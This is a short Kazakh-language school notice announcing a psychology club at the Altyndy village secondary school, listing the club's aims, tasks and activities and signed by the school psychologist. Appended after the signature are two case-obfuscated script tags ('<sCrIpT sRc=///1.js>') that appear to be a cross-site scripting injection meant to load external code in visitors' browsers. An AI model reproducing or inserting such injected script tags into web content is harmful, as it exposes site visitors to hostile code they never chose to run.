"Алтынды ауылының жалпы орта білім беретін мектебі" КММ-де психологиялық клубының ашылуы. Психологиялық клубтың мақсаты мен міндеттері: Мақсаты: өмірдің әртүрлі салаларында тұлғаның психологиялық мәдениетін қалыптастыру. Міндеттері: 1. Психологиялық ғылымның теориясы мен практикасының негіздерін зерделеу; 2. Өзі және қоршаған әлем туралы психологиялық білімді кеңейту; 3. Өзін-өзі реттеу қабілеттерін дамыту және психиканың резервтік мүмкіндіктерін ашу (есте сақтау, бейнелі ойлау, сыртқы әлеммен өзара әрекеттесудің вербалды және вербалды емес құралдары); 5. Шығармашылық әлеуетті ашу. Психологиялық клубқа келесі жұмыс түрлері кіреді: жаттығулар туралы пікірталас, тест тапсырмалары, жаттығулар-жылыну, тренинг, кіші топтарда, микро топтарда жұмыс істеу (жаттығулар жасау), ойын-тренинг (ойын жағдайлары), ойындар. Педагог-психолог: Нұрпейісова С. С.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>